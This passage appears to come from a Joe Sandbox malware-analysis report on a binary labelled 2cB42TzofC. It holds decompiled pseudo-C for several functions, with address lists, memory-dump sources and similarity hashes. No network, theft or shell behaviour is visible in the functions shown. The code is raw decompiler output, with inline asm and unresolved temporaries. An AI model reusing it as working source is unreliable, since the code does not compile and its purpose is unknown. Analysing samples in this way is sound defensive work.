								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E00A0AC46(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00A06D72(__eflags, 0x1f, _t151 + 0x24, _t151 + 0x45f8);
									E00A06FBA(0xa40f50, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E00A03DD8(_t148);
									}
								}
								L25:
								E00A11DEF(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E00A0CB95(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E00A01FB9(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E00A0CBFA(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00A06D41(__eflags, 0x1e, _t151 + 0x24);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E00A06D41(_t156, 0x1d, _t151 + 0x24);
					E00A06FBA(0xa40f50, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

















                                                        0x00a03ac2
                                                        0x00a03ac2
                                                        0x00a03ac7
                                                        0x00a03ad1
                                                        0x00a03ad7
                                                        0x00a03ad9
                                                        0x00a03ae0
                                                        0x00a03afe
                                                        0x00a03b05
                                                        0x00a03d47
                                                        0x00a03d4d
                                                        0x00000000
                                                        0x00a03d4d
                                                        0x00a03b0d
                                                        0x00a03b1e
                                                        0x00a03b24
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03b30
                                                        0x00a03b30
                                                        0x00a03b36
                                                        0x00a03b47
                                                        0x00a03b48
                                                        0x00a03b51
                                                        0x00a03b56
                                                        0x00a03b5d
                                                        0x00a03b62
                                                        0x00a03b6a
                                                        0x00a03b71
                                                        0x00a03b74
                                                        0x00a03b79
                                                        0x00a03b7c
                                                        0x00a03b7f
                                                        0x00a03bd4
                                                        0x00a03bd4
                                                        0x00a03bda
                                                        0x00a03c36
                                                        0x00a03c44
                                                        0x00a03c58
                                                        0x00a03c65
                                                        0x00a03c6b
                                                        0x00a03c71
                                                        0x00a03c79
                                                        0x00a03c7f
                                                        0x00a03c8b
                                                        0x00a03c97
                                                        0x00a03c9a
                                                        0x00a03c9d
                                                        0x00a03ca3
                                                        0x00a03ca9
                                                        0x00a03caf
                                                        0x00a03cb5
                                                        0x00a03cbb
                                                        0x00a03cc1
                                                        0x00a03cda
                                                        0x00a03cc3
                                                        0x00a03cc3
                                                        0x00a03cc4
                                                        0x00a03cc5
                                                        0x00a03cc6
                                                        0x00a03cc6
                                                        0x00a03cf4
                                                        0x00a03cf6
                                                        0x00a03d05
                                                        0x00a03d07
                                                        0x00a03d34
                                                        0x00a03d09
                                                        0x00a03d16
                                                        0x00a03d22
                                                        0x00a03d27
                                                        0x00a03d29
                                                        0x00a03d2d
                                                        0x00a03d2d
                                                        0x00a03d29
                                                        0x00a03d36
                                                        0x00a03d3c
                                                        0x00a03d42
                                                        0x00000000
                                                        0x00a03d44
                                                        0x00a03bdc
                                                        0x00a03be2
                                                        0x00a03be8
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03c11
                                                        0x00a03c1a
                                                        0x00a03c1a
                                                        0x00a03c31
                                                        0x00000000
                                                        0x00a03c31
                                                        0x00a03b81
                                                        0x00a03b87
                                                        0x00a03ba7
                                                        0x00a03ba7
                                                        0x00a03ba9
                                                        0x00a03bbc
                                                        0x00a03bcf
                                                        0x00a03bab
                                                        0x00a03bab
                                                        0x00a03bab
                                                        0x00000000
                                                        0x00a03ba9
                                                        0x00a03b89
                                                        0x00a03b97
                                                        0x00a03b9d
                                                        0x00000000
                                                        0x00a03b9d
                                                        0x00a03b8b
                                                        0x00a03b95
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03b95
                                                        0x00a03b38
                                                        0x00a03b3e
                                                        0x00000000
                                                        0x00a03b40
                                                        0x00a03b40
                                                        0x00000000
                                                        0x00a03b40
                                                        0x00a03ae2
                                                        0x00a03ae8
                                                        0x00a03af4
                                                        0x00a03d52
                                                        0x00a03d52
                                                        0x00a03d54
                                                        0x00a03d58
                                                        0x00a03d62
                                                        0x00a03d62

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 2ada00dbb45513f2995506ce89e69d9d6e238f0712b3b82567edf3bbbc636177
                                                        • Instruction ID: 0473e37b6230fb3ec2691098d3af2c064310a0389b0fdf7364ee7fbe1e926f6f
                                                        • Opcode Fuzzy Hash: 2ada00dbb45513f2995506ce89e69d9d6e238f0712b3b82567edf3bbbc636177
                                                        • Instruction Fuzzy Hash: C271B172104F88ABDF25DB70DD81AE7B7E8AF15305F44496EE1AB87182DB316A48CF11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0850D Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E00A0850D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				void* _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E00A1E554(E00A32104, _t95);
				E00A1E630();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E00A013A2(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00A0A097(_t6, __edi, _t93, _t93 + 0xf6) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E00A019C6(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d34; // -38196
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E00A10131(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E00A0BCC8(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E00A07119(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E00A0A6B9(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E00A086A5(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82fa) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x6201)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82fa)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82fa)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x6201));
								_t32 =  *((char*)(_t51 + 0x6201)) == 0;
								__eflags =  *((char*)(_t51 + 0x6201)) == 0;
								E00A11671((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf6);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00A01F20(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E00A03A31(_t34, _t89, _t93);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E00A08709(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00A06FBA(0xa40f50, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E00A01653(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}


















                                                        0x00a0850d
                                                        0x00a0850d
                                                        0x00a0850d
                                                        0x00a0850d
                                                        0x00a08512
                                                        0x00a0851c
                                                        0x00a08522
                                                        0x00a08524
                                                        0x00a0852d
                                                        0x00a08532
                                                        0x00a0853d
                                                        0x00a0854a
                                                        0x00a08552
                                                        0x00a08558
                                                        0x00a0855f
                                                        0x00a08572
                                                        0x00a08579
                                                        0x00a08580
                                                        0x00a08583
                                                        0x00a08585
                                                        0x00a0858b
                                                        0x00a08592
                                                        0x00a08599
                                                        0x00a085a0
                                                        0x00a085a5
                                                        0x00a085c0
                                                        0x00a085cc
                                                        0x00a085d3
                                                        0x00a085d8
                                                        0x00a085de
                                                        0x00a085e3
                                                        0x00a085e5
                                                        0x00a085ec
                                                        0x00a085f3
                                                        0x00a085f8
                                                        0x00a085fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00a085ad
                                                        0x00a085b3
                                                        0x00a085b9
                                                        0x00a085b9
                                                        0x00a085fc
                                                        0x00a08602
                                                        0x00a08602
                                                        0x00a08608
                                                        0x00a08611
                                                        0x00a08616
                                                        0x00a0861b
                                                        0x00a0861c
                                                        0x00a0861d
                                                        0x00a08625
                                                        0x00a08628
                                                        0x00a0862f
                                                        0x00a0862f
                                                        0x00a0862a
                                                        0x00a0862a
                                                        0x00a0862d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0862d
                                                        0x00a08636
                                                        0x00a08639
                                                        0x00a08640
                                                        0x00a08642
                                                        0x00a08650
                                                        0x00a08650
                                                        0x00a08657
                                                        0x00a08657
                                                        0x00a0865c
                                                        0x00a08662
                                                        0x00a08667
                                                        0x00a08667
                                                        0x00a0866d
                                                        0x00a08672
                                                        0x00a08677
                                                        0x00a08680
                                                        0x00a08685
                                                        0x00a08685
                                                        0x00a08667
                                                        0x00a08561
                                                        0x00a08568
                                                        0x00a08568
                                                        0x00a0855f
                                                        0x00a08689
                                                        0x00a0868f
                                                        0x00a0869a
                                                        0x00a086a4

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A08512
                                                          • Part of subcall function 00A013A2: __EH_prolog.LIBCMT ref: 00A013A7
                                                          • Part of subcall function 00A013A2: new.LIBCMT ref: 00A01420
                                                          • Part of subcall function 00A019C6: __EH_prolog.LIBCMT ref: 00A019CB
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: fdb1ca98e862dca0bac6a4e07ba7f3149c81923dc8d140397127a8d73eedbd33
                                                        • Instruction ID: 90671455061a904ce25c911439d3d64e3fa681b5701f62701f51a8ede9a0433e
                                                        • Opcode Fuzzy Hash: fdb1ca98e862dca0bac6a4e07ba7f3149c81923dc8d140397127a8d73eedbd33
                                                        • Instruction Fuzzy Hash: C841B27184069C9EDB20DB60ED55BEAB7B8AF10304F0500EAE58A930D3DF796AC8DF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A130C9 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E00A130C9(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t56 = __edx;
				_t48 = __ecx;
				_t29 = E00A1E554(E00A3229E, _t67);
				_push(_t48);
				_push(_t48);
				_t60 = _t48;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(_t60 + 0x20));
				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E00A1E7F3(_t48, _t56, 0x400400, _t72); // executed
					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
					_t29 = E00A1F5F0(_t60, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004); // executed
					_t36 = E00A1E7F3(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73); // executed
					_pop(0xa40f50);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00A11EB0);
						_push(E00A11CD0);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E00A1E65D(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E00A1F5F0(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00A238A3(0xa40f50); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0xa40f50 = 0x30c00;
								if(_t39 == 0) {
									E00A06EDC(0xa40f50);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}




















                                                        0x00a130c9
                                                        0x00a130c9
                                                        0x00a130ce
                                                        0x00a130d3
                                                        0x00a130d4
                                                        0x00a130d8
                                                        0x00a130da
                                                        0x00a130dc
                                                        0x00a130df
                                                        0x00a130e6
                                                        0x00a130e7
                                                        0x00a130ef
                                                        0x00a130f2
                                                        0x00a130f7
                                                        0x00a130f7
                                                        0x00a130fa
                                                        0x00a130fd
                                                        0x00a13108
                                                        0x00a1310f
                                                        0x00a13111
                                                        0x00a13114
                                                        0x00a13129
                                                        0x00a1312a
                                                        0x00a1312f
                                                        0x00a13130
                                                        0x00a13133
                                                        0x00a13136
                                                        0x00a13138
                                                        0x00a1313a
                                                        0x00a1313f
                                                        0x00a13144
                                                        0x00a13145
                                                        0x00a13145
                                                        0x00a13148
                                                        0x00a1314a
                                                        0x00a1314f
                                                        0x00a13150
                                                        0x00a13150
                                                        0x00a13155
                                                        0x00a1315f
                                                        0x00a13166
                                                        0x00a13170
                                                        0x00a13172
                                                        0x00a13174
                                                        0x00a13177
                                                        0x00a1317a
                                                        0x00a13183
                                                        0x00a1318a
                                                        0x00a13194
                                                        0x00a13199
                                                        0x00a1319f
                                                        0x00a131a2
                                                        0x00a131a9
                                                        0x00a131a9
                                                        0x00a131ae
                                                        0x00a131ae
                                                        0x00a131b1
                                                        0x00a131b6
                                                        0x00a131b9
                                                        0x00a131b9
                                                        0x00a13177
                                                        0x00a13170
                                                        0x00a131c4
                                                        0x00a131ce

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 8816459f665695ca42d0e4ee6e20f16bb4b0e77080d6c33d6adcb0cfab17e07e
                                                        • Instruction ID: 2788084828bd965886e794d3e308d8215ff68ef7baec2952d88449d01367ed89
                                                        • Opcode Fuzzy Hash: 8816459f665695ca42d0e4ee6e20f16bb4b0e77080d6c33d6adcb0cfab17e07e
                                                        • Instruction Fuzzy Hash: 7521E4B2E40215AFDF14DF79DD416AB76A8FF05354F04023AE919EB681E7709A80C6E8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A01E20 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 89%
                                                        			E00A01E20(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E00A1E554(E00A31FA5, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E00A03AC2(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E00A016F2(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00A01869(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E00A11692( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E00A1170D( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00A11748();
					}
					E00A01869(_t68, E00A23883( *_t68));
					_t49 = 1;
				}
				E00A015C2(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}











                                                        0x00a01e20
                                                        0x00a01e20
                                                        0x00a01e25
                                                        0x00a01e2e
                                                        0x00a01e32
                                                        0x00a01e35
                                                        0x00a01e38
                                                        0x00a01e3b
                                                        0x00a01e3e
                                                        0x00a01e41
                                                        0x00a01e49
                                                        0x00a01e4f
                                                        0x00a01e56
                                                        0x00a01e5e
                                                        0x00a01e66
                                                        0x00a01e71
                                                        0x00a01e74
                                                        0x00a01e78
                                                        0x00a01e7e
                                                        0x00a01e83
                                                        0x00a01e8d
                                                        0x00a01ea5
                                                        0x00a01ec6
                                                        0x00a01ea7
                                                        0x00a01ea7
                                                        0x00a01eaf
                                                        0x00a01eb8
                                                        0x00a01eb8
                                                        0x00a01e8f
                                                        0x00a01e8f
                                                        0x00a01e92
                                                        0x00a01e94
                                                        0x00a01e97
                                                        0x00a01e97
                                                        0x00a01ed6
                                                        0x00a01edc
                                                        0x00a01ede
                                                        0x00a01ee2
                                                        0x00a01eed
                                                        0x00a01ef7

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A01E25
                                                          • Part of subcall function 00A03AC2: __EH_prolog.LIBCMT ref: 00A03AC7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 9469c093aa865844a2fc82186660740340973ad43b565f5505e4a1df4fce8062
                                                        • Instruction ID: 7566d5e10f44d48d45cd8f7bab9e5b76ab81475178442522af2344bb41788ea3
                                                        • Opcode Fuzzy Hash: 9469c093aa865844a2fc82186660740340973ad43b565f5505e4a1df4fce8062
                                                        • Instruction Fuzzy Hash: 81215A32A002089FCF15DF98EA519EEFBF6BF48300F10046EE945A7291DB325E51CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1AA53 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E00A1AA53(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E00A1E554(E00A322F9, _t62);
				_push(_t47);
				E00A1E630();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E00A013A2(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00A01F6F(_t62 - 0x7d24, _t57, _t60, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_push(_t62 - 0x24);
					_t50 = _t62 - 0x7d24;
					_t33 = E00A01971(_t62 - 0x7d24, _t57);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E00A238A3(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E00A1F750(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E00A01609(_t62 - 0x24);
					E00A01653(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E00A01653(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}















                                                        0x00a1aa53
                                                        0x00a1aa53
                                                        0x00a1aa53
                                                        0x00a1aa58
                                                        0x00a1aa5d
                                                        0x00a1aa63
                                                        0x00a1aa69
                                                        0x00a1aa6a
                                                        0x00a1aa6d
                                                        0x00a1aa77
                                                        0x00a1aa7a
                                                        0x00a1aa88
                                                        0x00a1aa8c
                                                        0x00a1aa97
                                                        0x00a1aaa8
                                                        0x00a1aaab
                                                        0x00a1aaae
                                                        0x00a1aab1
                                                        0x00a1aab4
                                                        0x00a1aaba
                                                        0x00a1aabe
                                                        0x00a1aabf
                                                        0x00a1aac5
                                                        0x00a1aaca
                                                        0x00a1aacc
                                                        0x00a1aace
                                                        0x00a1aad1
                                                        0x00a1aad7
                                                        0x00a1aade
                                                        0x00a1aae3
                                                        0x00a1aae5
                                                        0x00a1aae7
                                                        0x00a1aaed
                                                        0x00a1aaf0
                                                        0x00a1aaf8
                                                        0x00a1aae9
                                                        0x00a1aae9
                                                        0x00a1aae9
                                                        0x00a1ab03
                                                        0x00a1ab03
                                                        0x00a1ab08
                                                        0x00a1ab13
                                                        0x00a1ab18
                                                        0x00a1aa99
                                                        0x00a1aa9f
                                                        0x00a1aaa4
                                                        0x00a1aaa4
                                                        0x00a1ab1f
                                                        0x00a1ab2a

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A1AA58
                                                          • Part of subcall function 00A013A2: __EH_prolog.LIBCMT ref: 00A013A7
                                                          • Part of subcall function 00A013A2: new.LIBCMT ref: 00A01420
                                                        Memory Dump Source
